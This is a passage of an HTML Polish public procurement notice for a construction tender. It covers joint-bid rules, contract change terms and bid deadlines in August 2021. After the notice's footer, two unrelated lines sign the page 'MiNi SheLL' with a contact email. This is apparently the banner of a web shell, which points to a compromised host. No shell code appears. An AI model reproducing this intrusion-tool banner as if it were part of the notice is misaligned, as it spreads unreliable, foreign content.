udzielenie zamówienia składa w swoim imieniu razem z ofertą oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp – wypełniony załącznik Nr 3 do SWZ, co potwierdzi brak podstaw wykluczenia każdego z nich oraz spełnienie warunków udziału w postępowaniu. <br/>c) Sposób składania dokumentów w ofercie wspólnej: <br/> dokumenty dotyczące własnej działalności składa każdy z Wykonawców <br/> w swoim imieniu, <br/> dokumenty składane wspólnie np. formularz oferty, wykaz osób – składa<br/> Pełnomocnik w imieniu wszystkich Wykonawców składających ofertę<br/> wspólną. <br/>d) Przed podpisaniem umowy wybrani Wykonawcy składający ofertę wspólną<br/> zobowiązani są przedstawić Zamawiającemu kopię umowy regulującej ich<br/> współpracę. <br/>e) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie<br/>odpowiadają za podpisanie i wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści<br/> wybranej oferty w zakresie uregulowanym w art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć na Platformie zakupowej pod adresem https://platformazakupowa.pl/pn/lebork na stronie prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-13 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com